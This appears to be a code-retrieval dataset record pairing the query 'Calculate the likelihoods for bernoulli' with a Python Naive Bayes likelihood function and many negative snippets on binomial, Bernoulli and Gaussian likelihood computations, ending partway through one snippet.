query
stringlengths
9
3.4k
document
stringlengths
9
87.4k
metadata
dict
negatives
listlengths
4
101
negative_scores
listlengths
4
101
document_score
stringlengths
3
10
document_rank
stringclasses
102 values
Calculate the likelihoods for bernoulli
def calculate_likelihoods_bernoulli(data, labels, vocab): classes = set(labels) likelihoods = {} # Calculate likelihood for each class for cls in classes: documentsInClass = [set(map(lambda y: y[0], data[x])) for x in range(len(data)) if labels[x] == cls] numDocsInClass = len(documentsInClass) results = {} for word in vocab: numDocsWithWordInClass = len(filter(lambda x: word in x, documentsInClass)) # Binary variable-- either present or not present results[word] = laplace_smooth(numDocsWithWordInClass, numDocsInClass, 2) # Special laplace smoothing for words not found in training data results[None] = laplace_smooth(0, numDocsInClass, 2) likelihoods[cls] = results return likelihoods
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def compute_prob_mle(X: np.ndarray, n: int) -> float:\n\n assert n > 1, \"for n = 1 use Bernoulli distribution.\"\n Binomial._check_input_data(X=X)\n Binomial._check_support(X=X, n=n)\n\n prob = X.mean() / n\n return prob", "def likelihood(self, data, hypo):\n tagged, n, k = data\n if hypo < tagged + n - k:\n return 0\n\n p = tagged / hypo\n like = thinkbayes.eval_binomial_pmf(k, n, p)\n return like", "def likelihood(params,data):\n spec, isnflux, igalflux = data\n chi2=0\n modflux = (params[0]*isnflux + params[1]*igalflux)\n chi2 += sum((spec.flux - modflux)**2)/((0.05*sum(spec.var)**2)/2.0)\n return np.exp(-chi2/2.0)", "def likelihood(self):\n \n raise NotImplementedError()", "def bayesian_info_criterion(log_likelihood, n_params, n_samples):\n return n_params * np.log(n_samples) - 2.0 * log_likelihood", "def multinomial_likelihood(m_true, alpha, alpha0, m_probs):\n\n ll = tf.reduce_sum(input_tensor=m_true * (tf.math.log(alpha0) - tf.math.log(alpha)), axis=1, keepdims=True)\n ll = tf.reduce_mean(input_tensor=ll)\n return ll", "def calculateBernoulli(x, mean, stdev):\n\t\t\tif x:\n\t\t\t\tprob = mean\n\t\t\telse:\n\t\t\t\tprob = 1-mean\n\t\t\treturn prob", "def _compute_likelihood(self, mus, pmfs):\n expected_counts = pmfs.copy()\n for mu, _p_bin_source in zip(mus, expected_counts):\n _p_bin_source *= mu # Works because of numpy view magic...\n expected_total = np.sum(expected_counts, axis=0)\n\n observed_counts = self.data_events_per_bin.histogram\n\n ret = observed_counts * np.log(expected_total) - expected_total - gammaln(observed_counts + 1.).real\n return np.sum(ret)", "def get_log_likelihood(response_probability, response):\n pass", "def likelihood(mean, logs, x):\n return -0.5 * (logs * 2. + ((x - mean) ** 2) / np.exp(logs * 2.) + GaussianDiag.Log2PI)", "def log_marginal_likelihood(X_train,y_train,phi,tau=1.,Ve=1.e-10):", "def BernoulliExponentialLoss(lamb) :\n def bexl(x, p) :\n N = K.int_shape(p)[1]\n recon = N*metrics.binary_crossentropy(x, p)\n dkl = K.sum((-1./lamb) + K.log(lamb) - 1, axis=-1)\n return recon+dkl\n return bexl", "def forward(self, xs, like_params, nan_mask=None):\n\t\tassert len(like_params) == 1, f\"BernoulliLikelihood only takes\" \\\n\t\t\t\t+ f\" a single parameter. Found {len(like_params)}.\"\n\t\t# Unwrap the single parameter tuple.\n\t\tlike_params = like_params[0] # [b,s,m,m_dim]\n\t\tassert len(like_params.shape) == 4, f\"len({like_params.shape}) != 4\"\n\t\txs = xs.unsqueeze(1) # [b,1,m,m_dim]\n\t\tdist = Bernoulli(logits=like_params)\n\t\tlog_probs = dist.log_prob(xs).sum(dim=3) # [b,s,m]\n\t\tif nan_mask is not None:\n\t\t\ttemp_mask = (~nan_mask).float().unsqueeze(1).expand(log_probs.shape)\n\t\t\tassert temp_mask.shape == log_probs.shape, \\\n\t\t\t\t\tf\"{temp_mask.shape} != {log_probs.shape}\"\n\t\t\tlog_probs = log_probs * temp_mask # [b,s,m]\n\t\treturn log_probs", "def bernoulli(p):\n bern = rn.binomial(1,p)\n return bern", "def log_likelihood_bernoulli(mu, target):\n # init\n batch_size = mu.size(0)\n mu = mu.view(batch_size, -1)\n target = target.view(batch_size, -1)\n\n # log_likelihood_bernoulli\n log_bernoulli = torch.sum(target * torch.log(mu) + (1. - target) * torch.log(1. - mu), dim=1)\n return log_bernoulli", "def bernoulli(n):\n\n x, res, s, c = Rat(0), Rat(0), Rat(0), Rat(-1)\n for k in range(1, n+2):\n c *= 1 - Rat(n + 2)/k\n s += x**n\n x += 1\n res += c*s/k\n return res", "def bernoulli_num(n):\n return mp.bernoulli(n)", "def logistic_function(self, data, b0, b1):\n return np.array([1/(1+exp(-1*b0+(-1*b1*x))) for x in data])", "def log_prob(self):", "def log_likelihood(data, probs):\n # Assume data is given as counts\n return _np.sum([nlogp(n, p) for n, p in zip(data, probs) if n > 0])", "def compute_prob_mle(X: np.ndarray) -> float:\n\n Bernoulli._check_input_data(X=X)\n Bernoulli._check_support(X=X)\n\n prob = X.mean()\n return prob", "def likelihood_prediction():\n # Get info\n selected_word = prompt_tech_selection()\n article_json = get_json_from_file()\n\n # Calculate results\n total_word_counter, selected_word_counter = count_occurrences(article_json, selected_word)\n probability = selected_word_counter / total_word_counter\n total_time = article_json[-1]['time'] - article_json[0]['time'] # unix subtraction = seconds\n months_in_train_set = total_time / SECONDS_IN_MONTH\n expected_posts_per_month = int(total_word_counter / months_in_train_set)\n\n # Show results\n print_text_results(expected_posts_per_month, probability, selected_word)\n plot_likelihood(expected_posts_per_month, probability)", "def bernoulli_logpmf(X, p):\n return -T.nnet.binary_crossentropy(p, X).sum(axis=-1)", "def log_likelihood(self,samples,times):\n prior_mu = np.ones(2*len(self.A)+1) \n prior_var = np.eye(2*len(self.A)+1)*0.7\n prior_p = np.log(self.prior_pdf())\n #prior_p = np.log(self.normal_prior(prior_mu,prior_var))\n xform = [self.sum_exp(t) for t in times]\n lp = scipy.stats.norm(xform,np.sqrt(self.var)).pdf(samples)\n sample_p =np.sum(np.log(lp))\n ll = prior_p + sample_p\n\n if np.isnan(ll):\n return -np.infty\n return ll", "def log_likelihood(self, data, reward_model, bias_params):", "def log_probability(self, samples):\n pass", "def BernoulliGaussianLoss(mu_kl, log_var_kl) :\n def bgl(x, p) :\n N = K.int_shape(p)[1]\n recon = N*metrics.binary_crossentropy(x, p)\n dkl = -0.5 * K.sum(-K.exp(log_var_kl) - K.square(mu_kl) + 1. + log_var_kl, axis=-1)\n return dkl + recon\n return bgl", "def likelihood(self,x,params = None,**kwargs):\n return np.exp(self.log_likelihood(x,params=params,**kwargs))", "def lnprob(theta, observables):\n prior = lnprior(theta)\n if not np.isfinite(prior):\n return -inf\n return prior + lnlike(theta, observables)", "def lnprobability(self):\n return", "def likelihood(x, n, P):\n if not isinstance(n, int) or (n <= 0):\n raise ValueError('n must be a positive integer')\n if not isinstance(x, int) or (x < 0):\n raise ValueError(\n 'x must be an integer that is greater than or equal to 0')\n if x > n:\n raise ValueError('x cannot be greater than n')\n if not isinstance(P, np.ndarray) or len(P.shape) != 1:\n raise TypeError('P must be a 1D numpy.ndarray')\n if not np.all((P >= 0) & (P <= 1)):\n raise ValueError('All values in P must be in the range [0, 1]')\n nume = np.math.factorial(n)\n deno = (np.math.factorial(x) * (np.math.factorial(n - x)))\n fact = nume / deno\n P_likelihood = fact * (np.power(P, x)) * (np.power((1 - P), (n - x)))\n return P_likelihood", "def test_Bernoulli_NB_estimators():", "def binomial(n, p):\n sum_ans = 0\n for k in range(n):\n sum_ans = sum_ans + bernoulli(p)\n return sum_ans", "def calculateLogJointProbabilities(self, datum):\n logJoint = util.Counter()\n \n \"*** YOUR CODE HERE ***\"\n \n # -- OUR CODE HERE\n \n \n import math\n for label in self.legalLabels:\n sumThing = 0.0\n for pixel in self.conditionalProb[label]:\n if datum[pixel] is 1:\n #assert self.conditionalProb[label][pixel] < 1.0 # -- sanity check that the probability is valid\n sumThing += math.log((self.conditionalProb[label][pixel]*1.0))\n else:\n sumThing+=math.log(1-self.conditionalProb[label][pixel]*1.0)\n logJoint[label] = math.log(self.prior[label]*1.0) + sumThing*1.0\n \n\n \n \n import time\n #print \"logJoint is :: \", logJoint\n #time.sleep(2)\n \n \n # -- uses the conditional probability tables computed in the current iteration\n # -- in train and tune\n \n return logJoint", "def likelihood(self):\n\n # assert the Gaussian process is up to date\n self._gp_up_to_date()\n\n noise_penalization_term = -1 / 2 * np.log(\n np.linalg.det(self.cov_matrix))\n\n y = np.linalg.solve(self.cov_matrix, self.list_y)\n y = np.array(self.list_y) @ y\n data_fidelity_term = -1 / 2 * y\n\n nbr_obs_term = - self.n_observation * np.log(2 * np.pi)\n likelihood = (\n noise_penalization_term + data_fidelity_term + nbr_obs_term\n )\n return likelihood", "def log_likelihood(self, x):\n # set nuisance parameters to their central values!\n predictions = self.get_predictions(self.shortarray_to_array(x), nuisance=False)\n m_obj = flavio.Measurement['Pseudo-measurement for FastFit instance: ' + self.name]\n m_obs = m_obj.all_parameters\n prob_dict = m_obj.get_logprobability_all(predictions)\n ll = sum(prob_dict.values())\n return ll", "def naivebayesPXY_mle(x,y):\n pos_denom = x[y==1].sum()\n neg_denom = x[y==-1].sum()\n posprob = x[y==1].sum(axis = 0)/pos_denom\n negprob = x[y==-1].sum(axis = 0)/neg_denom\n return posprob, negprob", "def compute_Bayes(BIC, BIC_wo, BIC_white):\n from scipy.misc import logsumexp\n lnprob = -0.5*BIC - np.logaddexp(-0.5*BIC, -0.5*BIC_wo)\n # BIC of H1 - BIC H0\n # larger value favours H1\n logBayes = 0.5 * (-1.0*BIC + BIC_wo)\n #lnprob = np.log(1./3.) - 0.5*BIC - logsumexp([BIC, BIC_wo, BIC_white])\n #print(np.log(1./3.), - 0.5*BIC, - logsumexp([BIC, BIC_wo, BIC_white]))\n logprob = logBayes - logsumexp([logBayes, 1.])\n #print(\"2lnK: \", 2.0*logBayes)\n lnprob_w = -0.5 * BIC - logsumexp([-0.5*BIC, -0.5*BIC_wo, -0.5*BIC_white])\n lnprob_wo = -0.5 * BIC_wo - logsumexp([-0.5*BIC, -0.5*BIC_wo, -0.5*BIC_white])\n lnprob_white = -0.5 * BIC_white - logsumexp([-0.5*BIC, -0.5*BIC_wo, -0.5*BIC_white])\n #print(0.5 * (BIC_wo - BIC))\n #prob = np.exp(-0.5*BIC) / (np.exp(-0.5*BIC) + np.exp(-0.5*BIC_wo))\n return np.exp(lnprob_w), np.exp(lnprob_wo), np.exp(lnprob_white)", "def likelihood(alphas, sigmas, mus, x):\n if len(alphas.shape) == 0:\n alphas = np.expand_dims(alphas, 1)\n sigmas = np.expand_dims(sigmas, 1)\n k = alphas.shape[0]\n t_dim = int(mus.shape[0] / k)\n\n likelihood_ = 0.0\n\n for i in range(k):\n likelihood_t = gaussian_np(x, mus[i*t_dim:(i+1)*t_dim], sigmas[i])\n likelihood_ += alphas[i] * likelihood_t\n\n return likelihood_", "def log_likelihood(self, points):\n\t\tpoint_set = list(points)\n\t\tlog_probabilities = [np.log(self.density(point)) for point in point_set]\n\t\treturn sum(log_probabilities)", "def logistic(mu, hw, x): \n n = np.exp(- ((x-mu)/(.477*hw))**2)\n return (2. * n)/( 1 + n)", "def log_multinomial_coefficient(n, x):\n return gammaln(n + 1) - gammaln(x + 1).sum()", "def nloglikeobs(self, params):\n lambda_ = params[0]\n\n ll_output = self._LL(self.endog, rate=lambda_)\n\n return -np.log(ll_output)", "def compute_prob_mle(X: np.ndarray) -> float:\n\n Geometric._check_input_data(X=X)\n Geometric._check_support(X=X)\n\n prob = 1 / X.mean()\n return prob", "def compute_log_prob(self,params: ndarray) -> float:\n return self.compute_log_prior(params) + self.compute_log_likelihood(params)", "def test_marginal_likelihood(self):\n data = np.repeat([1, 0], [50, 50])\n marginals = []\n a_prior_0, b_prior_0 = 1.0, 1.0\n a_prior_1, b_prior_1 = 20.0, 20.0\n\n for alpha, beta in ((a_prior_0, b_prior_0), (a_prior_1, b_prior_1)):\n with pm.Model() as model:\n a = pm.Beta(\"a\", alpha, beta)\n y = pm.Bernoulli(\"y\", a, observed=data)\n trace = pm.sample_smc(2000, chains=2, return_inferencedata=False)\n # log_marginal_likelihood is found in the last value of each chain\n lml = np.mean([chain[-1] for chain in trace.report.log_marginal_likelihood])\n marginals.append(lml)\n\n # compare to the analytical result\n assert abs(np.exp(marginals[1] - marginals[0]) - 4.0) <= 1", "def probability(self, X_):\n X = np.c_[np.ones(X_.shape[0]), X_] # Add one for bias to the first columns\n probs = np.zeros(X.shape[0])\n ### YOUR CODE HERE\n z = X.dot(self.w)\n probs = log_reg.logistic(z)\n ### END CODE\n assert probs.shape == (X.shape[0],)\n return probs", "def __log_likelihood(self, params, *args):\n\t\tX, y, feature_set, lambda_reg, empirical_weights, verbose, sign = args\n\n\t\tno_example = len(X)\n\t\ttotal_logZ = 0\n\t\ttotal_logProb = 0\n\t\texpected_weights = np.zeros(len(feature_set))\n\t\tfor t in range(len(X)):\n\t\t\t# example_features = X[t], example_labels = y[t]\n\n\t\t\tpotential = np.zeros(len(X[t]))\n\t\t\tfor i in range(len(X[t])):\n\t\t\t\t#candidate_features = X[t][i], candidate_label = y[t][i]\n\t\t\t\tpotential[i] = feature_set.calc_inner_product(X[t][i], params)\n\n\t\t\t#scaling\n\t\t\tpotential = potential - np.max(potential, keepdims=True)\n\n\t\t\tfor i in range(len(X[t])):\n\t\t\t\ttotal_logProb += potential[i] * y[t][i]\n\n\t\t\tpotential, Z = self.__softmax(potential)\n\n\t\t\tfor i in range(len(X[t])):\n\t\t\t\tfeature_set.calc_inner_sum(expected_weights, X[t][i], potential[i])\n\n\t\t\ttotal_logZ += log(Z)\n\n\t\t# _params = feature_set.get_regularized_params(params, 'bias')\n\t\t_params = params\n\t\tlog_likelihood = total_logProb - total_logZ - (lambda_reg/2) * np.sum(np.multiply(_params,_params))\n\t\tgradients = empirical_weights - expected_weights - lambda_reg * _params\n\n\t\tglobal SUB_ITERATION_NUM\n\t\tif verbose:\n\t\t\tsub_iteration_str = ' '\n\t\t\tif SUB_ITERATION_NUM > 0:\n\t\t\t\tsub_iteration_str = '(' + '{0:02d}'.format(SUB_ITERATION_NUM) + ')'\n\t\t\tprint(' ', '{0:03d}'.format(ITERATION_NUM), sub_iteration_str, ':', log_likelihood * sign)\n\n\t\tSUB_ITERATION_NUM += 1\n\n\t\treturn sign * log_likelihood, sign * gradients", "def calculateLogJointProbabilities(self, datum):\n\tlogJoint = util.Counter()\n\t#want to calculate log(P(y)) + log(sum(P(fi|y)))\n\t#where y is a label\n\tfor label in self.legalLabels:\n\t\tlogJoint[label] = math.log(self.prior_distribution_prob[label])\n\t\tfor feature, value in datum.items():\n\t\t\tcp = self.conditional_prob[label][feature][value]\n\t\t\tif cp > 0: #condition check for values < 0 because log(0) is undefined and math domain error occurs\n\t\t\t\tlogJoint[label] += math.log(cp) #summing up\n\t\t\t\t\n\treturn logJoint", "def _compute_log_likelihood(self, parameters):\n raise NotImplementedError('')", "def likelihood(ts,w,Phi):\n a = Phi.dot(w)\n return np.exp(a*ts)*sigmoid(-a)", "def prob_logit(x):\n try:\n if len(x.shape) != 1:\n raise ValueError(\"unexpected shape of input vector\\nexpected:\" + str(1) + \", actual: \" + str(len(x.shape)))\n except ValueError as e:\n print(e)\n print()\n raise\n\n x = 1.0 * np.exp(-x)\n\n probability = np.concatenate(\n (\n (x / (1.0 + x)).reshape(x.shape[0], 1),\n (1.0 / (1.0 + x)).reshape(x.shape[0], 1)\n ),\n axis=1\n )\n\n return probability", "def __call__(self):\n\n accepted = False\n\n while not accepted:\n\n test_log10E = np.random.uniform(1, 7)\n\n test_pdf = np.random.uniform(self._min_pdf, self._max_pdf)\n\n if test_pdf < self._likelihood(10 ** test_log10E, self._index):\n\n accepted = True\n\n return 10 ** test_log10E", "def Likelihood(self, data, hypo):\n p_correct = hypo\n score = data\n\n k = self.exam.Reverse(score)\n n = self.exam.max_score\n like = thinkbayes2.EvalBinomialPmf(k, n, p_correct)\n return like", "def get_likelihood(self, observation, position, direction):\n if self.real_robot and observation == 0.0:\n return 1.0\n\n closest = self.world_model.get_closest_wall(position, direction)\n if closest == None:\n # probability of a false positive is 0\n if observation == 0.0:\n return 1.0\n else:\n return 0.0\n elif closest != None and observation == 0.0:\n # probability of missing an obstacle is 0\n return 0.0\n return norm(0, self.model_noise_rate).pdf(abs(position - closest) - observation)", "def _compute_log_likelihood(self, X, S):\n log_likelihood = 0\n for n in range(self.n_col):\n likelihood = 1\n for k in range(self.n_components):\n likelihood *= self.weights[k] \\\n * multivariate_normal(self.means[k], self.covs[k]).pdf(X[n]) \\\n * poisson(self.rates[k]).pmf(S[n])\n log_likelihood += np.log(likelihood)\n\n return log_likelihood", "def log_likelihood(y_true, y_pred):\n ll = np.sum(y_true * np.log(y_pred) - y_pred)\n return ll", "def get_log_likelihood(response_probability, observed_response):\n \n return np.log(response_probability[observed_response])", "def bernoulli(p):\r\n if np.random.random() < p:\r\n return 0\r\n else:\r\n return 1", "def naivebayes(x,y,xtest,naivebayesPXY):\n pos, neg = naivebayesPY(x, y)\n posprob, negprob = naivebayesPXY(x, y)\n numerator = np.dot(xtest, np.log(posprob)) + np.log(pos)\n denominator = np.dot(xtest, np.log(negprob)) + np.log(neg)\n logratio = numerator - denominator\n return logratio", "def multinomial_nll(true_counts, logits):\n counts_per_example = tf.reduce_sum(true_counts, axis=-1)\n dist = tfp.distributions.Multinomial(total_count=counts_per_example,\n logits=logits)\n return (-tf.reduce_sum(dist.log_prob(true_counts)) / \n tf.cast(tf.shape(true_counts)[0], dtype=tf.float32))", "def lnprob(theta, dtarray, dmagarray, sigmaarray):\n lp = lnprior(theta)\n\n if not np.isfinite(lp):\n #if (lp==-(10**32)):\n return -np.inf\n #return -(10**32)\n return lp +lnlike(theta, dtarray, dmagarray, sigmaarray)", "def predictionBinaryClassifier(x, beta):\n x = np.insert(x, 0, 1, axis = 1)\n probability = logisticFunction(np.dot(beta, x.T))\n func = np.vectorize(lambda x: 1 if x >=0.5 else 0)\n probability = func(probability)\n return probability", "def compute_prob_mle(X: np.ndarray, k: int) -> np.ndarray:\n\n assert k > 2, \"for k = 2 use Bernoulli distribution.\"\n Categorical._check_input_data(X=X)\n Categorical._check_support(X=X, k=k)\n\n prob = np.zeros(k)\n for x in X:\n prob[x] += 1\n prob /= prob.sum()\n\n return prob", "def log_likelihood(self, x):\n return self.log_likelihood_exp(x) + self.log_prior_nuisance_parameters(x)", "def naiveBayes(self):\n acc = 0\n #for each example in the test-set\n for d in self.dev:\n pred_good = self.prob_True\n pred_bad = self.prob_False\n #calc the probability for yes and no\n for index in range(len(d[0])):\n pred_good *= self.probs_yes[(index,d[0][index])]\n pred_bad *=(self.probs_no[(index,d[0][index])])\n pred = False\n if pred_good >= pred_bad:\n pred = True\n if pred == d[1]:\n acc +=1\n return acc/len(self.dev)", "def prob(x):\n\treturn 1. * bivariate_normal(x, (0., 1.2), (1., 1.), .8) + \\\n\t 1.05 * bivariate_normal(x, (.6, -1.), (1.3, .7), -.6)", "def likelihood_function(X, taus, mus, sigmas):\n N = X.shape[0] # number of data points\n get_component_prob = lambda x: component_pdfs(x, mus, sigmas)\n T = np.apply_along_axis(arr=X, func1d=get_component_prob, axis=1) # gaussian component probabilities in row format (NxK)\n taus_rep = np.tile(taus, reps=(N, 1)) # repeat tau along N-axis so elementwise product can work\n\n return np.sum(T*taus_rep, axis=1)", "def gaussian_likelihood(x, mu, log_std):\n prob = -0.5 * (((x - mu) / (tf.exp(log_std) + EPS)) ** 2 + 2 * log_std + np.log(2 * np.pi))\n return tf.reduce_sum(prob, axis=1)", "def estimate_brownian_model(trials):\n trials = tuple(trials) # Required for numba\n @jit\n def loglikelihood(m_0, m_t, v_0, v_t, v_n):\n total = 0.0\n \n for trial_i in numba.prange(len(trials)):\n trial = trials[trial_i]\n total += trial_loglikelihood(trial, m_0, m_t, v_0, v_t, v_n)\n return total\n\n\n fit = scipy.optimize.minimize(\n lambda x: -loglikelihood(*x[:2], *np.exp(x[2:])),\n [0.0, 0.0, np.log(1.0), np.log(1.0), np.log(1.0)])\n m_0, m_t = fit.x[:2]\n v_0, v_t, v_n = np.exp(fit.x[2:])\n\n return m_0, m_t, v_0, v_t, v_n", "def lnlike(params, observables, nDraws=1000000):\n #print('checking type ({}) and length ({}) of params in lnlikefxn'.format(type(params),len(params)))\n evalData=generateModelData(params, distance_standoffMid, nDraws)\n evalHist, evalBinEdges = np.histogram(evalData[:,3], tof_nBins, tof_range,\n density=True)\n logEvalHist = np.log(evalHist)\n #print(logEvalHist)\n # find what TOFs have zero observed data\n # we'll use this to handle cases where we might wind up with -inf*0\n # likelihood is fine if PDF is 0 somewhere where no data is found\n # without checks though, ln(PDF=0)=-inf, -inf*0 = nan\n # however, if PDF is 0 (lnPDF=-inf) where there IS data, lnL should be -inf\n zeroObservedIndices = np.where(observables == 0)[0]\n for idx in zeroObservedIndices:\n if logEvalHist[idx] == -inf:\n logEvalHist[zeroObservedIndices] = 0\n \n loglike = np.dot(logEvalHist,observables)\n return loglike", "def lnprob(self, p):\n\n\n\n\t\tchisq = np.sum(self.deviates(p)[-1]**2)/2.0\n\t\tN = np.sum(self.TLC.bad == 0)\n\n\t\t# sum the deviates into a chisq-like thing\n\t\tlnlikelihood = -N * np.log(self.instrument.rescaling.value) - chisq/self.instrument.rescaling.value**2\n\t\tif np.isfinite(lnlikelihood) == False:\n\t\t\tlnlikelihood = -1e9\n\n\t\t# initialize an empty constraint, which could freak out if there's something bad about this fit\n\t\tconstraints = 0.0\n\n\t\t# loop over the parameters\n\n\n\t\tfor parameter in self.parameters:\n\n\t\t\t# if a parameter is outside its allowed range, then make the constraint very strong!\n\t\t\tinside = (parameter.value < parameter.limits[1]) & (parameter.value > parameter.limits[0])\n\t\t\ttry:\n\t\t\t\tassert(inside)\n\t\t\texcept AssertionError:\n\t\t\t\tconstraints -= 1e6\n\n\t\t# return the constrained likelihood\n\t\treturn lnlikelihood + constraints", "def naiveBayesMixture(train_set, train_labels, dev_set, bigram_lambda,unigram_smoothing_parameter, bigram_smoothing_parameter, pos_prior):\n\n # TODO: Write your code here\n # return predicted labels of development set\n\n # counters for Training Phase\n ham = Counter()\n ham_bi = Counter()\n spam = Counter()\n spam_bi = Counter()\n\n for string, label in zip(train_set, train_labels):\n for i in range(len(string)):\n word = string[i]\n if i != len(string)-1:\n word_bi = string[i] + ' ' + string[i+1]\n if label == 1:\n ham_bi.update({word_bi:1})\n else:\n spam_bi.update({word_bi:1})\n if label == 1:\n ham.update({word:1})\n else:\n spam.update({word:1})\n\n ham_len = 0\n for w in ham:\n ham_len += ham[w]\n spam_len = 0\n for w in spam:\n spam_len += spam[w]\n \n hambi_len = 0\n for w in ham_bi:\n hambi_len += ham_bi[w]\n spambi_len = 0\n for w in spam_bi:\n spambi_len += spam_bi[w]\n\n # labels for Development Phase\n dev_labels = []\n # dicts for P(word|ham) and P(word|spam)\n p_ham = {}\n p_spam = {}\n p_hambi = {}\n p_spambi = {}\n\n # develop likelihoods based on dev_set\n for word in ham:\n numerator = ham[word] + unigram_smoothing_parameter\n denominator = ham_len + unigram_smoothing_parameter*(len(ham))\n p_ham[word] = numerator / denominator\n for word in spam:\n numerator = spam[word] + unigram_smoothing_parameter\n denominator = spam_len + unigram_smoothing_parameter*(len(spam))\n p_spam[word] = numerator / denominator\n\n for word_bi in ham_bi:\n numerator = ham_bi[word_bi] + bigram_smoothing_parameter\n denominator = hambi_len + bigram_smoothing_parameter*(len(ham_bi))\n p_hambi[word_bi] = numerator / denominator\n for word_bi in spam_bi:\n numerator = spam_bi[word_bi] + bigram_smoothing_parameter\n denominator = spambi_len + bigram_smoothing_parameter*(len(spam_bi))\n p_spambi[word_bi] = numerator / denominator\n \n numerator = unigram_smoothing_parameter\n denominator = ham_len + unigram_smoothing_parameter*(len(ham))\n p_ham_zero = numerator / denominator\n denominator = spam_len + unigram_smoothing_parameter*(len(spam))\n p_spam_zero = numerator / denominator\n\n numerator = bigram_smoothing_parameter\n denominator = hambi_len + bigram_smoothing_parameter*(len(ham_bi))\n p_hambi_zero = numerator / denominator\n denominator = spambi_len + bigram_smoothing_parameter*(len(spam_bi))\n p_spambi_zero = numerator / denominator\n\n for string in dev_set:\n p_words_ham = math.log(pos_prior)\n p_words_spam = math.log(1 - pos_prior)\n\n p_words_hambi = math.log(pos_prior)\n p_words_spambi = math.log(1 - pos_prior)\n \n for i in range(len(string)):\n word = string[i]\n if word in p_ham:\n p_words_ham += math.log(p_ham[word])\n else:\n p_words_ham += math.log(p_ham_zero)\n if word in p_spam:\n p_words_spam += math.log(p_spam[word])\n else:\n p_words_spam += math.log(p_spam_zero)\n\n if i != len(string)-1:\n word_bi = string[i] + ' ' + string[i+1]\n if word_bi in p_hambi:\n p_words_hambi += math.log(p_hambi[word_bi])\n else:\n p_words_hambi += math.log(p_hambi_zero)\n if word_bi in p_spambi:\n p_words_spambi += math.log(p_spambi[word_bi])\n else:\n p_words_spambi += math.log(p_spambi_zero)\n\n p_ham_mix = p_words_ham*(1-bigram_lambda) + p_words_hambi*bigram_lambda\n p_spam_mix = p_words_spam*(1-bigram_lambda) + p_words_spambi*bigram_lambda\n\n dev_labels.append(p_ham_mix >= p_spam_mix)\n\n return dev_labels", "def log_likelihood(self, y_list):\n if self.lambda_mat is None:\n raise ValueError(\"Can't compute model likelihood before fitting!\")\n\n # precision prior distribution given precision hyper-parameters\n prec_distr = stats.gamma(a=self.prec_distr[0],\n scale=self.prec_distr[1] ** -1.0)\n\n # likelihood of projection matrix precision priors given\n # precision hyper-parameters\n lambda_logl = np.sum(\n prec_distr.logpdf(self.lambda_mat['alpha']\n / self.lambda_mat['beta'])\n )\n\n # likelihood of projection matrix values given their precision priors\n a_logl = np.sum(\n stats.norm(loc=0, scale=(self.lambda_mat['beta']\n / self.lambda_mat['alpha']))\n .logpdf(self.A_mat['mu'])\n )\n\n # likelihood of latent feature matrix given kernel matrix,\n # projection matrix, and standard deviation hyper-parameter\n h_logl = np.sum(\n stats.norm(loc=self.A_mat['mu'].transpose() @ self.kernel_mat,\n scale=self.sigma_h)\n .logpdf(self.H_mat['mu'])\n )\n\n # likelihood of bias parameter precision priors given\n # precision hyper-parameters\n weight_prior_logl = np.sum(\n prec_distr.logpdf(np.array(self.weight_priors['alpha'])\n / np.array(self.weight_priors['beta']))\n )\n\n # likelihood of bias parameters given their precision priors\n weight_logl = np.sum(\n stats.norm(loc=0, scale=(np.array(self.weight_priors['beta'])\n / np.array(self.weight_priors['alpha'])))\n .logpdf(self.weight_mat['mu'])\n )\n\n # likelihood of predicted outputs given latent features, bias\n # parameters, and latent feature weight parameters\n f_logl = np.sum(\n stats.norm(\n loc=(self.weight_mat['mu'][1:, :].transpose()\n @ self.H_mat['mu']\n + np.vstack(self.weight_mat['mu'][0, :])),\n scale=1).logpdf(self.output_mat['mu'])\n )\n\n # likelihood of actual output labels given class separation margin\n # and predicted output labels\n y_logl = np.sum(self.get_y_logl(y_list))\n\n return (lambda_logl + a_logl + h_logl\n + weight_prior_logl + weight_logl + f_logl + y_logl)", "def calculateLogJointProbabilities(self, datum):\n logJoint = util.Counter()\n \"*** YOUR CODE HERE ***\"\n\t#Adds log(P(y)) to calculate P(y|f1,f2...)\n for label in self.legalLabels:\n\t\tlogJoint[label] += math.log(self.prior[label])\n\t#Adds log(P(f1|y)), log(P(f2|y))... to calculate P(y|f1, f2...)\n for key in datum:\n\t\t#if key == (7, 3):\n\t\t\t#print self.condprobs[key, 0]\n\t\tfor label in self.legalLabels:\n\t\t\t#print str(key) + str(datum[key])\n\t\t\tlogJoint[label] += math.log(self.condprobs[key, label][datum[key]])\n return logJoint", "def likelihood_genotype(genotype, bases_all_reads, error_rates):\n likelihood = 1\n for observed_base in bases_all_reads:\n p = 0\n for base in \"ACGT-\":\n l = prob_t_N(genotype, base) * error_rates[base][observed_base]\n p += l\n likelihood *= p\n\n return likelihood", "def lnprob(params, cos2, y, yerr):\n\n # Get prior given parameters\n lp = lnprior(params)\n if not np.isfinite(lp):\n return -np.inf\n\n # Include likelihood given data\n llh = lp + lnlike(params, cos2, y, yerr)\n\n return llh", "def likelihood(\n self,\n observation: np.ndarray,\n state: np.ndarray,\n control_z: Optional[np.ndarray] = None\n ) -> np.matrix:\n pass", "def binomial(n: int, p: float) -> int:\n return sum(bernoulli_trial(p) for _ in range(n))", "def compute_likelihood(self, corpus: str, test_corpus: str, n: int):\n probs_per_ngram = self.compute_probabilities_per_word(corpus, n)\n test_corpus_tokens = self.tokenize(test_corpus, n)\n test_corpus_ngrams = ()\n end_i = len(test_corpus_tokens) - 1\n for i in range(end_i):\n if i - (n - 1) < 0:\n continue\n test_corpus_ngrams = test_corpus_ngrams + (self._make_ngrams(test_corpus_tokens, i, n), )\n likelihood_of_test_corpus = 1\n for test_corpus_ngram in test_corpus_ngrams:\n likelihood_of_test_corpus = likelihood_of_test_corpus * probs_per_ngram[test_corpus_ngram]\n return likelihood_of_test_corpus", "def LLR_binom(k, n, p0, EPS=1E-15):\n phat = k/n # maximum likelihood estimate\n phat[phat < EPS] = 2*EPS\n\n # Log-likelihood (density) ratios\n LLR = 2*( (k*np.log(phat)+(n-k)*np.log(1-phat)) - (k*np.log(p0)+(n-k)*np.log(1-p0)))\n return LLR", "def _LL(state, effects, observed_frequencies) -> float:\n observed_frequencies = np.array(observed_frequencies)\n predicted_probs = np.array([np.real(np.trace(state.dot(effect))) for effect in effects])\n return sum(np.log10(predicted_probs) * observed_frequencies)", "def beta_binomial_log_likelihood_grad(\n alpha, beta,\n positive_weights, negative_weights, total_weights\n):\n res = np.empty((2, alpha.size))\n res[0] = sparse_gammaln_ratio(alpha, positive_weights, deriv=1)\n res[1] = 